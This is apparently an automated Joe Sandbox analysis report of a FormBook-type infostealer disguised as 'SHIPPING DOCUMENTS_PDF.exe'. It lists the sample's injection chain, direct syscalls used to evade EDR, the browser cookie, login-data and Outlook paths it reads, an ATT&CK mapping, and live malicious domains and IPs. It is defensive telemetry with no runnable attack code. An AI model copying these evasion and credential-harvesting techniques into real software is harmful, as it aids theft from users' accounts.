                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h] | 2_2_030649D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h] | 2_2_030FA9D3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h] | 2_2_030BE9E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] | 2_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] | 2_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h] | 2_2_030BC810
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] | 2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] | 2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] | 2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h] | 2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] | 2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] | 2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h] | 2_2_0306A830
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] | 2_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] | 2_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h] | 2_2_03042840
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BA80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, | 0_2_00BA80A9
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00B7A124 SetUnhandledExceptionFilter, | 0_2_00B7A124
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00B7A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_00B7A155

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\waitfor.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: NULL target: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe protection: read write
                Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: NULL target: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\waitfor.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\waitfor.exe | Thread register set: target process: 5300
                Source: C:\Windows\SysWOW64\waitfor.exe | Thread APC queued: target process: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 257008
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BA87B1 LogonUserW, | 0_2_00BA87B1
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00B53B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, | 0_2_00B53B3A
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00B548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_00B548D7
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BB4C27 mouse_event, | 0_2_00BB4C27
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | Process created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
                Source: C:\Windows\SysWOW64\waitfor.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BA7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 0_2_00BA7CAF
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BA874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, | 0_2_00BA874B
                Source: SHIPPING DOCUMENTS_PDF.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: pNkvbgLNQpIoyz.exe, 00000003.00000000.2170603809.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472998871.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000000.2312740289.0000000001191000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: SHIPPING DOCUMENTS_PDF.exe, pNkvbgLNQpIoyz.exe, 00000003.00000000.2170603809.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472998871.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000000.2312740289.0000000001191000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: pNkvbgLNQpIoyz.exe, 00000003.00000000.2170603809.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472998871.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000000.2312740289.0000000001191000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: pNkvbgLNQpIoyz.exe, 00000003.00000000.2170603809.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472998871.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000000.2312740289.0000000001191000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00B7862B cpuid | 0_2_00B7862B
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00B84E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, | 0_2_00B84E87
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00B91E06 GetUserNameW, | 0_2_00B91E06
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00B83F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, | 0_2_00B83F3A
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00B549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, | 0_2_00B549A0

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.4b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.4b0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.4473308327.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4473351797.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4472444044.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2248280939.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2249418016.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2248660468.0000000002970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.4473260603.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\waitfor.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: SHIPPING DOCUMENTS_PDF.exe | Binary or memory string: WIN_81
                Source: SHIPPING DOCUMENTS_PDF.exe | Binary or memory string: WIN_XP
                Source: SHIPPING DOCUMENTS_PDF.exe | Binary or memory string: WIN_XPe
                Source: SHIPPING DOCUMENTS_PDF.exe | Binary or memory string: WIN_VISTA
                Source: SHIPPING DOCUMENTS_PDF.exe | Binary or memory string: WIN_7
                Source: SHIPPING DOCUMENTS_PDF.exe | Binary or memory string: WIN_8
                Source: SHIPPING DOCUMENTS_PDF.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.4b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.4b0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.4473308327.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4473351797.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4472444044.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2248280939.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2249418016.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2248660468.0000000002970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.4473260603.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BC6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00BC6283
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BC6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00BC6747

                MITRE ATT&CK Matrix (techniques listed per tactic column; a number in parentheses is the matched-signature count shown in the matrix)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
                Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
                Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph

                Behavior Graph ID: 1573434
                Sample: SHIPPING DOCUMENTS_PDF.exe
                Startdate: 12/12/2024
                Architecture: WINDOWS
                Score: 100

                Start
                  DNS/IP: www.growbamboo.xyz; www.070001813.xyz; 27 other IPs or domains
                  Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 5 other signatures
                  www.070001813.xyz: Performs DNS queries to domains with low reputation
                  started: SHIPPING DOCUMENTS_PDF.exe

                SHIPPING DOCUMENTS_PDF.exe
                  Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
                  started: svchost.exe

                svchost.exe
                  Signatures: Maps a DLL or memory area into another process
                  injected: pNkvbgLNQpIoyz.exe

                pNkvbgLNQpIoyz.exe (injected by svchost.exe)
                  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                  started: waitfor.exe

                waitfor.exe
                  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                  injected: pNkvbgLNQpIoyz.exe
                  started: firefox.exe

                pNkvbgLNQpIoyz.exe (injected by waitfor.exe)
                  DNS/IP: banajibazar.xyz 173.208.249.155 (ports 49929, 49935, 49941), WIIUS, United States; b1-3-r111.kunlundns.top 101.32.205.61 (ports 50005, 50006, 50007), TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN, China; 10 other IPs or domains
                  Signatures: Found direct / indirect Syscall (likely to bypass EDR)

                Screenshots: this section contains all screenshots as thumbnails, including those not shown in the slideshow (images not reproduced here).

                Antivirus Detection
                Source | Detection | Scanner | Label
                SHIPPING DOCUMENTS_PDF.exe | 53% | ReversingLabs | Win32.Trojan.AZORult
                SHIPPING DOCUMENTS_PDF.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
IP | Domain | Country | ASN | ASN Name | Malicious
3.125.36.175 | thezensive.netlify.app | United States | 16509 | AMAZON-02US | true
161.97.142.144 | www.070001813.xyz | United States | 51167 | CONTABODE | true
173.208.249.155 | banajibazar.xyz | United States | 32097 | WIIUS | true
209.74.79.42 | www.primespot.live | United States | 31744 | MULTIBAND-NEWHOPEUS | true
101.32.205.61 | b1-3-r111.kunlundns.top | China | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | true
172.67.176.240 | www.zrichiod-riech.sbs | United States | 13335 | CLOUDFLARENETUS | true
18.139.62.226 | dns.ladipage.com | United States | 16509 | AMAZON-02US | false
38.6.78.235 | www.17jkgl.com | United States | 174 | COGENT-174US | true
150.109.11.247 | rk.jingdong.skin | Singapore | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | true
84.32.84.32 | activateya.life | Lithuania | 33922 | NTT-LT-ASLT | true
3.33.130.190 | emirates-visa.net | United States | 8987 | AMAZONEXPANSIONGB | true
124.71.162.21 | www.walkecode.top | China | 55990 | HWCSNETHuaweiCloudServicedatacenterCN | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1573434
Start date and time: 2024-12-12 00:17:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SHIPPING DOCUMENTS_PDF.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@17/12
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 45
